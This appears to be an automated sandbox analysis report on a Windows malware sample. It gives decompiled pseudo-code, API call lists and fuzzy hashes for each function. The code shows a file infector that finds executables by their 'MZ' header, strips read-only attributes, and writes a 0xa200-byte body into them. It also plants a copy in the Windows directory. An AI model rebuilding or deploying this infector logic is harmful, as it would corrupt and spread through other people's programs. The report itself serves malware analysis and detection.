                                                                                                                          										_v9 = 1;
                                                                                                                          										_t130 = E0040340C(_v8);
                                                                                                                          										_t85 = GetFileAttributesA(_t130); // executed
                                                                                                                          										_t173 = _t85;
                                                                                                                          										if((_t173 & 0x00000001) > 0) {
                                                                                                                          											SetFileAttributesA(_t130, 0);
                                                                                                                          										}
                                                                                                                          										_t131 = E00405BDC();
                                                                                                                          										_t175 = E004064CC();
                                                                                                                          										E00406CA8(_t87, 0, _v8);
                                                                                                                          										E00406510(_t175, _t86);
                                                                                                                          										E00405974();
                                                                                                                          										E00404198();
                                                                                                                          										E00405988(_t131);
                                                                                                                          										E00404520(_t131);
                                                                                                                          										E00404520(_t175);
                                                                                                                          										_t132 = E00404B68(_v8, 0xc0000303);
                                                                                                                          										if(_t103 != 0xffffffff) {
                                                                                                                          											E00404BC4(_t132, 2,  &_v41488);
                                                                                                                          											if(_v41488 == 0x4d && _v41487 == 0x5a) {
                                                                                                                          												E00404BB4(_t132, 0, 0);
                                                                                                                          												E00404BC4(_t132, 0xa200,  &_v41488);
                                                                                                                          												E0040254C( &_v40254, 4,  &_v16);
                                                                                                                          												E00407080( &_v41488, _v16, 0x3e8);
                                                                                                                          												E00404BB4(_t132, 0, 0);
                                                                                                                          												E00404BE0(_t132, 0xa200, 0x40a698);
                                                                                                                          												E00404BB4(_t132, 2, 0);
                                                                                                                          												E00404BE0(_t132, 0xa200,  &_v41488);
                                                                                                                          											}
                                                                                                                          										}
                                                                                                                          										E00404B90(_t132);
                                                                                                                          										if((_t173 & 0x00000001) > 0) {
                                                                                                                          											SetFileAttributesA(E0040340C(_v8), _t173);
                                                                                                                          										}
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					goto L17;
                                                                                                                          				}
                                                                                                                          			}

























                                                                                                                          APIs
                                                                                                                          • GetFileAttributesA.KERNEL32(00000000), ref: 00407318
                                                                                                                          • SetFileAttributesA.KERNEL32(00000000,00000000,00000000), ref: 0040732A
                                                                                                                            • Part of subcall function 00404B68: CreateFileA.KERNEL32(00408220,80000301,80000301,00000000,80000301,80000301,00000000,00404CB4,00000000,00404CE6), ref: 00404B88
                                                                                                                          • SetFileAttributesA.KERNEL32(00000000,00000000,00000000), ref: 00407461
                                                                                                                            • Part of subcall function 00404BC4: ReadFile.KERNEL32(00000000,MZP,?,?,00000000,00000000,?,00404CC7,00000000,00404CE6), ref: 00404BCF
                                                                                                                            • Part of subcall function 00404BB4: SetFilePointer.KERNEL32(00000000,000003E8,00000000,?,00407179,00000000,004071BF,?,00000000), ref: 00404BBC
                                                                                                                            • Part of subcall function 00404BE0: WriteFile.KERNEL32(00000000,MZP,0000A200,?,00000000,?,?,0040742B), ref: 00404BEA
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: File$Attributes$CreatePointerReadWrite
                                                                                                                          • String ID: M$MZP$Z$\PROGRA~1\
                                                                                                                          • API String ID: 997383822-4093836345
                                                                                                                          • Opcode ID: 41512908c4d33e48550e6b3331c925b36c29bc90fc27bbf57195ac31950a3692
                                                                                                                          • Instruction ID: 377d96c4788612fdddee84976f6eb16641268004b287eb3b442383de46351668
                                                                                                                          • Opcode Fuzzy Hash: 41512908c4d33e48550e6b3331c925b36c29bc90fc27bbf57195ac31950a3692
                                                                                                                          • Instruction Fuzzy Hash: 71514370B042045BDB10FB6ACC82A8EB7A59F85308F1085BBB504B73D3DA7DEF454A5A
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 68%
                                                                                                                          			E00401788() {
                                                                                                                          				void* _t11;
                                                                                                                          				signed int _t13;
                                                                                                                          				intOrPtr _t19;
                                                                                                                          				void* _t20;
                                                                                                                          				intOrPtr _t23;
                                                                                                                          
                                                                                                                          				_push(_t23);
                                                                                                                          				_push(E0040183E);
                                                                                                                          				_push( *[fs:edx]);
                                                                                                                          				 *[fs:edx] = _t23;
                                                                                                                          				_push(0x40a5b4);
                                                                                                                          				L004010DC();
                                                                                                                          				if( *0x40a035 != 0) {
                                                                                                                          					_push(0x40a5b4);
                                                                                                                          					L004010E4();
                                                                                                                          				}
                                                                                                                          				E0040114C(0x40a5d4);
                                                                                                                          				E0040114C(0x40a5e4);
                                                                                                                          				E0040114C(0x40a610);
                                                                                                                          				_t11 = LocalAlloc(0, 0xff8); // executed
                                                                                                                          				 *0x40a60c = _t11;
                                                                                                                          				if( *0x40a60c != 0) {
                                                                                                                          					_t13 = 3;
                                                                                                                          					do {
                                                                                                                          						_t20 =  *0x40a60c; // 0x0
                                                                                                                          						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
                                                                                                                          						_t13 = _t13 + 1;
                                                                                                                          					} while (_t13 != 0x401);
                                                                                                                          					 *((intOrPtr*)(0x40a5f8)) = 0x40a5f4;
                                                                                                                          					 *0x40a5f4 = 0x40a5f4;
                                                                                                                          					 *0x40a600 = 0x40a5f4;
                                                                                                                          					 *0x40a5ac = 1;
                                                                                                                          				}
                                                                                                                          				_pop(_t19);
                                                                                                                          				 *[fs:eax] = _t19;
                                                                                                                          				_push(0x401845);
                                                                                                                          				if( *0x40a035 != 0) {
                                                                                                                          					_push(0x40a5b4);
                                                                                                                          					L004010EC();
                                                                                                                          					return 0;
                                                                                                                          				}
                                                                                                                          				return 0;
                                                                                                                          			}









                                                                                                                          APIs
                                                                                                                          • RtlInitializeCriticalSection.KERNEL32(0040A5B4,00000000,0040183E,?,?,00402022,0040A5F4,00000000,00000000,?,?,00401A11,00401A26,00401B77), ref: 0040179E
                                                                                                                          • RtlEnterCriticalSection.KERNEL32(0040A5B4,0040A5B4,00000000,0040183E,?,?,00402022,0040A5F4,00000000,00000000,?,?,00401A11,00401A26,00401B77), ref: 004017B1
                                                                                                                          • LocalAlloc.KERNEL32(00000000,00000FF8,0040A5B4,00000000,0040183E,?,?,00402022,0040A5F4,00000000,00000000,?,?,00401A11,00401A26,00401B77), ref: 004017DB
                                                                                                                          • RtlLeaveCriticalSection.KERNEL32(0040A5B4,00401845,00000000,0040183E,?,?,00402022,0040A5F4,00000000,00000000,?,?,00401A11,00401A26,00401B77), ref: 00401838
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 730355536-0
                                                                                                                          • Opcode ID: 3b04e8016ad8e9f8d98138e13965f200bb98bfb7b6ef7e396ad35bd5d2b4b672
                                                                                                                          • Instruction ID: b00ea9f5082304a52c30b3310984ccb38099dd734a88c9f27aa2559637ee1f83
                                                                                                                          • Opcode Fuzzy Hash: 3b04e8016ad8e9f8d98138e13965f200bb98bfb7b6ef7e396ad35bd5d2b4b672
                                                                                                                          • Instruction Fuzzy Hash: 400184B0604380AEE715AF6A9D06B167BA4E749704F04C53FA140B66F2CA7D44A0CB5F
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 89%
                                                                                                                          			E00406B48(intOrPtr* __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi) {
                                                                                                                          				intOrPtr* _v8;
                                                                                                                          				intOrPtr _v12;
                                                                                                                          				intOrPtr _v16;
                                                                                                                          				signed int _v20;
                                                                                                                          				intOrPtr _v24;
                                                                                                                          				char _v28;
                                                                                                                          				struct _ICONINFO _v48;
                                                                                                                          				void* _t65;
                                                                                                                          				void* _t72;
                                                                                                                          				signed int _t81;
                                                                                                                          				intOrPtr* _t82;
                                                                                                                          				intOrPtr* _t85;
                                                                                                                          				void* _t98;
                                                                                                                          				void* _t99;
                                                                                                                          				intOrPtr _t103;
                                                                                                                          				intOrPtr _t104;
                                                                                                                          				signed int _t111;
                                                                                                                          				intOrPtr* _t112;
                                                                                                                          				intOrPtr _t116;
                                                                                                                          				intOrPtr _t117;
                                                                                                                          				void* _t118;
                                                                                                                          				void* _t119;
                                                                                                                          				void* _t120;
                                                                                                                          				void* _t121;
                                                                                                                          				void* _t124;
                                                                                                                          
                                                                                                                          				_v28 = 0;
                                                                                                                          				_v16 = __ecx;
                                                                                                                          				_v12 = __edx;
                                                                                                                          				_v8 = __eax;
                                                                                                                          				_push(_t124);
                                                                                                                          				_push(0x406c97);
                                                                                                                          				_push( *[fs:eax]);
                                                                                                                          				 *[fs:eax] = _t124 + 0xffffffd4;
                                                                                                                          				_t116 = _v12;
                                                                                                                          				if(_t116 < 0) {
                                                                                                                          					L8:
                                                                                                                          					_v24 = E00405968();
                                                                                                                          					_push(_v12 + 1 + _v12 + 1);
                                                                                                                          					E00403B24();
                                                                                                                          					_t117 = _v12;
                                                                                                                          					if(_t117 >= 0) {
                                                                                                                          						_t120 = _t117 + 1;
                                                                                                                          						_v20 = 0;
                                                                                                                          						_t85 = _v8;
                                                                                                                          						do {
                                                                                                                          							GetIconInfo( *( *_t85 + 0x1c),  &_v48);
                                                                                                                          							_t81 = _v20 + _v20;
                                                                                                                          							 *((intOrPtr*)(_v28 + _t81 * 4)) = _v48.hbmColor;
                                                                                                                          							 *((intOrPtr*)(_v28 + 4 + _t81 * 4)) = _v48.hbmMask;
                                                                                                                          							_v20 = _v20 + 1;
                                                                                                                          							_t85 = _t85 + 4;
                                                                                                                          							_t120 = _t120 - 1;
                                                                                                                          						} while (_t120 != 0);
                                                                                                                          					}
                                                                                                                          					_t65 = E00406638(_v28, _v16, E00403970()); // executed
                                                                                                                          					if(_t65 == 0) {
                                                                                                                          						E00405990(_v16);
                                                                                                                          					}
                                                                                                                          					_t118 = E00403970();
                                                                                                                          					if(_t118 >= 0) {
                                                                                                                          						_t119 = _t118 + 1;
                                                                                                                          						_v20 = 0;
                                                                                                                          						do {
                                                                                                                          							_t72 =  *(_v28 + _v20 * 4);
                                                                                                                          							if(_t72 != 0) {
                                                                                                                          								DeleteObject(_t72);
                                                                                                                          							}
                                                                                                                          							_v20 = _v20 + 1;
                                                                                                                          							_t119 = _t119 - 1;
                                                                                                                          						} while (_t119 != 0);
                                                                                                                          					}
                                                                                                                          				} else {
                                                                                                                          					_t121 = _t116 + 1;
                                                                                                                          					_v20 = 0;
                                                                                                                          					_t82 = _v8;
                                                                                                                          					while( *((intOrPtr*)( *_t82 + 0x1c)) != 0) {
                                                                                                                          						_t111 = _v20 + 1;
                                                                                                                          						_t98 = _v12 - _t111;
                                                                                                                          						if(_t98 < 0) {
                                                                                                                          							L7:
                                                                                                                          							_v20 = _v20 + 1;
                                                                                                                          							_t82 = _t82 + 4;
                                                                                                                          							_t121 = _t121 - 1;
                                                                                                                          							if(_t121 != 0) {
                                                                                                                          								continue;
                                                                                                                          							} else {
                                                                                                                          								goto L8;
                                                                                                                          							}
                                                                                                                          						} else {
                                                                                                                          							_t99 = _t98 + 1;
                                                                                                                          							_t112 = _v8 + _t111 * 4;
                                                                                                                          							while( *((intOrPtr*)( *_t82 + 0x18)) !=  *((intOrPtr*)( *_t112 + 0x18))) {
                                                                                                                          								_t112 = _t112 + 4;
                                                                                                                          								_t99 = _t99 - 1;
                                                                                                                          								if(_t99 != 0) {
                                                                                                                          									continue;
                                                                                                                          								} else {
                                                                                                                          									goto L7;
                                                                                                                          								}
                                                                                                                          								goto L18;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						goto L18;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				L18:
                                                                                                                          				_pop(_t103);
                                                                                                                          				 *[fs:eax] = _t103;
                                                                                                                          				_push(E00406C9E);
                                                                                                                          				_t104 =  *0x406b28; // 0x406b2c
                                                                                                                          				return E00403B30( &_v28, _t104);
                                                                                                                          			}





























                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: DeleteIconInfoObject
                                                                                                                          • String ID: ,k@
                                                                                                                          • API String ID: 2689914137-1053005162
                                                                                                                          • Opcode ID: 5b49ef8e9806a3f921fc3957ab8aab80d154f68e659bcce45d0d70881c4801f7
                                                                                                                          • Instruction ID: dacdd831d29519e08e7e99a77df17fc26ef5cc856f0b9114ccf97923e4886ce8
                                                                                                                          • Opcode Fuzzy Hash: 5b49ef8e9806a3f921fc3957ab8aab80d154f68e659bcce45d0d70881c4801f7
                                                                                                                          • Instruction Fuzzy Hash: 9F413AB0E0021A9FDB14DF99C881AAEBBB4FF48314F11407AD942B7391D734AE51CB98
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00401304(void* __eax, void** __ecx, void* __edx) {
                                                                                                                          				void* _t4;
                                                                                                                          				void** _t9;
                                                                                                                          				void* _t13;
                                                                                                                          				void* _t14;
                                                                                                                          				long _t16;
                                                                                                                          				void* _t17;
                                                                                                                          
                                                                                                                          				_t9 = __ecx;
                                                                                                                          				_t14 = __edx;
                                                                                                                          				_t17 = __eax;
                                                                                                                          				 *(__ecx + 4) = 0x100000;
                                                                                                                          				_t4 = VirtualAlloc(__eax, 0x100000, 0x2000, 4); // executed
                                                                                                                          				_t13 = _t4;
                                                                                                                          				 *_t9 = _t13;
                                                                                                                          				if(_t13 == 0) {
                                                                                                                          					_t16 = _t14 + 0x0000ffff & 0xffff0000;
                                                                                                                          					_t9[1] = _t16;
                                                                                                                          					_t4 = VirtualAlloc(_t17, _t16, 0x2000, 4); // executed
                                                                                                                          					 *_t9 = _t4;
                                                                                                                          				}
                                                                                                                          				if( *_t9 != 0) {
                                                                                                                          					_t4 = E00401154(0x40a5d4, _t9);
                                                                                                                          					if(_t4 == 0) {
                                                                                                                          						VirtualFree( *_t9, 0, 0x8000);
                                                                                                                          						 *_t9 = 0;
                                                                                                                          						return 0;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				return _t4;
                                                                                                                          			}










                                                                                                                          APIs
                                                                                                                          • VirtualAlloc.KERNEL32(?,00100000,00002000,00000004,0040A5E4,?,?,?,00401670), ref: 00401322
                                                                                                                          • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,00100000,00002000,00000004,0040A5E4,?,?,?,00401670), ref: 00401347
                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00100000,00002000,00000004,0040A5E4,?,?,?,00401670), ref: 0040136D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Virtual$Alloc$Free
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3668210933-0
                                                                                                                          • Opcode ID: e17c01c161f917c304470fc5bdd154c62ee178939f0222dfd3bc6fa3e96f4c6e
                                                                                                                          • Instruction ID: 68b8f7d00e12c5576b1b617c6ecf0cca3c834072eeb02b8dde9827deaaa3e0cb
                                                                                                                          • Opcode Fuzzy Hash: e17c01c161f917c304470fc5bdd154c62ee178939f0222dfd3bc6fa3e96f4c6e
                                                                                                                          • Instruction Fuzzy Hash: 22F0AFB1641320AAFB316A6A8C86F433AD8DB45794F104076BB48FF7DAD6B95800866C
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 51%
                                                                                                                          			E004079A0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                          				char _v8;
                                                                                                                          				char _v12;
                                                                                                                          				char _v16;
                                                                                                                          				char _v20;
                                                                                                                          				char _v24;
                                                                                                                          				char _v28;
                                                                                                                          				void* _t31;
                                                                                                                          				void* _t59;
                                                                                                                          				intOrPtr _t73;
                                                                                                                          				void* _t82;
                                                                                                                          				void* _t83;
                                                                                                                          				intOrPtr _t86;
                                                                                                                          
                                                                                                                          				_t83 = __esi;
                                                                                                                          				_t82 = __edi;
                                                                                                                          				_t54 = __ebx;
                                                                                                                          				_push(0);
                                                                                                                          				_push(0);
                                                                                                                          				_push(0);
                                                                                                                          				_push(0);
                                                                                                                          				_push(0);
                                                                                                                          				_push(0);
                                                                                                                          				_push(__ebx);
                                                                                                                          				_push(_t86);
                                                                                                                          				_push(0x407ac4);
                                                                                                                          				_push( *[fs:eax]);
                                                                                                                          				 *[fs:eax] = _t86;
                                                                                                                          				E00407080(0x4091e0, 0xb, 0xb);
                                                                                                                          				E004031F4( &_v12, 0xb, 0x4091e0);
                                                                                                                          				_push(_v12);
                                                                                                                          				E00404F90( &_v16, __ebx, 0xb);
                                                                                                                          				_pop(_t59);
                                                                                                                          				E00403258( &_v8, _t59, _v16);
                                                                                                                          				if(E00404B9C() != 0) {
                                                                                                                          					DeleteFileA(E0040340C(_v8)); // executed
                                                                                                                          				}
                                                                                                                          				_t31 = E00404BF8(E0040340C(_v8), _t54, 0xa200, 0x40a698, _t82, _t83); // executed
                                                                                                                          				if(_t31 != 0) {
                                                                                                                          					E00407080(0x4091ec, 0x1a, 0x1a);
                                                                                                                          					E004031F4( &_v20, 0x1a, 0x4091ec);
                                                                                                                          					_t55 = E0040575C(0x80000000, 0x1a, _v20);
                                                                                                                          					E00407080(0x409208, 8, 8);
                                                                                                                          					E004031F4( &_v28, 8, 0x409208);
                                                                                                                          					E00403258( &_v24, _v28, _v8);
                                                                                                                          					E0040578C(_t40, _v24, 0);
                                                                                                                          					E004057CC(_t55);
                                                                                                                          				}
                                                                                                                          				_pop(_t73);
                                                                                                                          				 *[fs:eax] = _t73;
                                                                                                                          				_push(E00407ACB);
                                                                                                                          				return E004030B8( &_v28, 6);
                                                                                                                          			}
















                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00404F90: GetWindowsDirectoryA.KERNEL32(?,00000105,00000000,00404FFA,?,?,?,00407EB6,00000000,00408020,?,?,00000000,00000000,?,0040819C), ref: 00404FBE
                                                                                                                            • Part of subcall function 00404B9C: GetFileAttributesA.KERNEL32(00000000,00407EDD,00000000,00408020,?,?,00000000,00000000,?,0040819C,00000000,00408220), ref: 00404BA2
                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00407AC4,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00408200,00000000,00408220), ref: 00407A0D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: File$AttributesDeleteDirectoryWindows
                                                                                                                          • String ID: MZP
                                                                                                                          • API String ID: 3550186980-2889622443
                                                                                                                          • Opcode ID: 3ee79c2a49ddb8816c4432ff5edea5131a792a15af00d109a84fb823656587da
                                                                                                                          • Instruction ID: 69b580403c23d9cc841dfa7c227de2d2e2536c961132663fd28ad6461d03daee
                                                                                                                          • Opcode Fuzzy Hash: 3ee79c2a49ddb8816c4432ff5edea5131a792a15af00d109a84fb823656587da
                                                                                                                          • Instruction Fuzzy Hash: 91212F70B04109ABDB04FAA5C85279F7B69EB85304F50847EA501BB3C2DF3CEE05976A
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00404BC4(void* __eax, long __ecx, void* __edx) {
                                                                                                                          				int _t2;
                                                                                                                          				void* _t3;
                                                                                                                          				DWORD* _t8;
                                                                                                                          
                                                                                                                          				_t2 = ReadFile(__eax, __edx, __ecx, _t8, 0); // executed
                                                                                                                          				_t3 = 0;
                                                                                                                          				if(_t2 == 0) {
                                                                                                                          					return 0;
                                                                                                                          				}
                                                                                                                          				return _t3;
                                                                                                                          			}







                                                                                                                          APIs
                                                                                                                          • ReadFile.KERNEL32(00000000,MZP,?,?,00000000,00000000,?,00404CC7,00000000,00404CE6), ref: 00404BCF
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FileRead
                                                                                                                          • String ID: MZP
                                                                                                                          • API String ID: 2738559852-2889622443
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00404BE0(void* __eax, long __ecx, void* __edx) {
                                                                                                                          				int _t2;
                                                                                                                          				void* _t3;
                                                                                                                          				void* _t7;
                                                                                                                          				DWORD* _t9;
                                                                                                                          
                                                                                                                          				_t2 = WriteFile(__eax, __edx, __ecx, _t9, 0); // executed
                                                                                                                          				_t3 = _t7;
                                                                                                                          				if(_t2 == 0) {
                                                                                                                          					return 0;
                                                                                                                          				}
                                                                                                                          				return _t3;
                                                                                                                          			}








                                                                                                                          APIs
                                                                                                                          • WriteFile.KERNEL32(00000000,MZP,0000A200,?,00000000,?,?,0040742B), ref: 00404BEA
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FileWrite
                                                                                                                          • String ID: MZP
                                                                                                                          • API String ID: 3934441357-2889622443
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00401788: RtlInitializeCriticalSection.KERNEL32(0040A5B4,00000000,0040183E,?,?,00402022,0040A5F4,00000000,00000000,?,?,00401A11,00401A26,00401B77), ref: 0040179E
                                                                                                                            • Part of subcall function 00401788: RtlEnterCriticalSection.KERNEL32(0040A5B4,0040A5B4,00000000,0040183E,?,?,00402022,0040A5F4,00000000,00000000,?,?,00401A11,00401A26,00401B77), ref: 004017B1
                                                                                                                            • Part of subcall function 00401788: LocalAlloc.KERNEL32(00000000,00000FF8,0040A5B4,00000000,0040183E,?,?,00402022,0040A5F4,00000000,00000000,?,?,00401A11,00401A26,00401B77), ref: 004017DB
                                                                                                                            • Part of subcall function 00401788: RtlLeaveCriticalSection.KERNEL32(0040A5B4,00401845,00000000,0040183E,?,?,00402022,0040A5F4,00000000,00000000,?,?,00401A11,00401A26,00401B77), ref: 00401838
                                                                                                                          • RtlEnterCriticalSection.KERNEL32(0040A5B4,00000000,00401FF0), ref: 00401EBF
                                                                                                                          • RtlLeaveCriticalSection.KERNEL32(0040A5B4,00401FF7), ref: 00401FEA
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2227675388-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 72%
                                                                                                                          			E00407BD4(void* __eax, void* __ebx, void* __esi) {
                                                                                                                          				void* _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				intOrPtr _v16;
                                                                                                                          				char _v20;
                                                                                                                          				char _v40258;
                                                                                                                          				char _v41492;
                                                                                                                          				char _v41496;
                                                                                                                          				void* _t35;
                                                                                                                          				void* _t53;
                                                                                                                          				void* _t58;
                                                                                                                          				CHAR* _t88;
                                                                                                                          				intOrPtr _t101;
                                                                                                                          				intOrPtr _t111;
                                                                                                                          				void* _t114;
                                                                                                                          				void* _t115;
                                                                                                                          				intOrPtr _t116;
                                                                                                                          
                                                                                                                          				_t87 = __ebx;
                                                                                                                          				_t114 = _t115;
                                                                                                                          				_push(__eax);
                                                                                                                          				_t35 = 0xa;
                                                                                                                          				do {
                                                                                                                          					_t115 = _t115 + 0xfffff004;
                                                                                                                          					_push(_t35);
                                                                                                                          					_t35 = _t35 - 1;
                                                                                                                          					_t117 = _t35;
                                                                                                                          				} while (_t35 != 0);
                                                                                                                          				_t116 = _t115 + 0xfffffdf0;
                                                                                                                          				_push(__ebx);
                                                                                                                          				_v41496 = 0;
                                                                                                                          				E004033FC(_v8);
                                                                                                                          				_push(_t114);
                                                                                                                          				_push(0x407d8d);
                                                                                                                          				_push( *[fs:eax]);
                                                                                                                          				 *[fs:eax] = _t116;
                                                                                                                          				E004031F4( &_v41496, 3, 0x4091c0);
                                                                                                                          				_t100 = _v41496;
                                                                                                                          				if(E00406FE4(_v8, __ebx, _v41496, _t117) == 0) {
                                                                                                                          					L10:
                                                                                                                          					__eflags = 0;
                                                                                                                          					_pop(_t101);
                                                                                                                          					 *[fs:eax] = _t101;
                                                                                                                          					_push(E00407D94);
                                                                                                                          					E00403094( &_v41496);
                                                                                                                          					return E00403094( &_v8);
                                                                                                                          				} else {
                                                                                                                          					_t53 = E0040258C( *_v8) + 0xbf - 2;
                                                                                                                          					if(_t53 < 0) {
                                                                                                                          						goto L10;
                                                                                                                          					} else {
                                                                                                                          						_t120 = _t53 == 0x19;
                                                                                                                          						if(_t53 == 0x19) {
                                                                                                                          							goto L10;
                                                                                                                          						} else {
                                                                                                                          							E00407AD0(_v8, _t87, __esi, _t120); // executed
                                                                                                                          							_t58 = E00407130(_v8, _t87); // executed
                                                                                                                          							if(_t58 == 0) {
                                                                                                                          								goto L10;
                                                                                                                          							} else {
                                                                                                                          								_t88 = E0040340C(_v8);
                                                                                                                          								_v12 = GetFileAttributesA(_t88);
                                                                                                                          								_t122 = _v12 & 0x00000001;
                                                                                                                          								if((_v12 & 0x00000001) > 0) {
                                                                                                                          									SetFileAttributesA(_t88, 0);
                                                                                                                          								}
                                                                                                                          								_v16 = E00405B84(_v8, _t100, _t122);
                                                                                                                          								_push(_t114);
                                                                                                                          								_push(0x407d4a);
                                                                                                                          								_push( *[fs:eax]);
                                                                                                                          								 *[fs:eax] = _t116;
                                                                                                                          								E0040597C(_v16);
                                                                                                                          								E00405974();
                                                                                                                          								E00405988(_v16);
                                                                                                                          								E0040254C( &_v40258, 4,  &_v20);
                                                                                                                          								E00407080( &_v41492, _v20, 0x3e8);
                                                                                                                          								E00405974();
                                                                                                                          								E0040598C(_v16);
                                                                                                                          								E0040597C(_v16);
                                                                                                                          								E00405980(_v16);
                                                                                                                          								_pop(_t111);
                                                                                                                          								 *[fs:eax] = _t111;
                                                                                                                          								_push(E00407D51);
                                                                                                                          								return E00404520(_v16);
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          			}



















                                                                                                                          0x00407d17
                                                                                                                          0x00407d1f
                                                                                                                          0x00407d2f
                                                                                                                          0x00407d36
                                                                                                                          0x00407d39
                                                                                                                          0x00407d3c
                                                                                                                          0x00407d49
                                                                                                                          0x00407d49
                                                                                                                          0x00407c6b
                                                                                                                          0x00407c53
                                                                                                                          0x00407c4b

                                                                                                                          APIs
                                                                                                                          • GetFileAttributesA.KERNEL32(00000000,00000000,00407D8D), ref: 00407C7C
                                                                                                                          • SetFileAttributesA.KERNEL32(00000000,00000000), ref: 00407C90
